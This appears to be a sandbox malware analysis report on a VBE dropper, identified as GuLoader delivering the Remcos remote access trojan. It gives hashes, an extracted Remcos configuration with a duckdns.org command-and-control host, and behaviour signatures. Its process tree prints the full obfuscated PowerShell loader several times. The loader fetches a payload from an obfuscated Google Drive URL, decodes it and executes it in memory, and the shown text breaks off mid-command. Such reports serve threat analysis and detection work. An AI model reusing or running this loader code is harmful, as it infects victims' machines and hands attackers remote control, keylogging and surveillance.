Overview

overview

10

Static

static

1

6754a59389...c5.vbe

windows7-x64

10

6754a59389...c5.vbe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-09-2024 09:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5.vbe

  • Size

    33KB

  • MD5

    3d931d67341a7178eed6018098e82026

  • SHA1

    28738415421b3631245b7f8939ff625bb2d56d7a

  • SHA256

    6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5

  • SHA512

    7ba628cd12f11eede084bdc30a29c1d1092b14ba468bcbab319b327e637ffb49d825298402ec4389f8e9032a4741a8ca015132d47a31336e8cb4e56750f9f979

  • SSDEEP

    384:Z9vOg3Z9KsZOs0gN/C2NE3+DEytdZbFo/SwiKFTblveb0fyio/:Zp3Z/N/C2K3v2LfwiKFsk4

Score
10/10
guloaderremcosremotehostdiscoverydownloaderrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5.vbe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3712
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
        3⤵
          PID:316
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2888
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 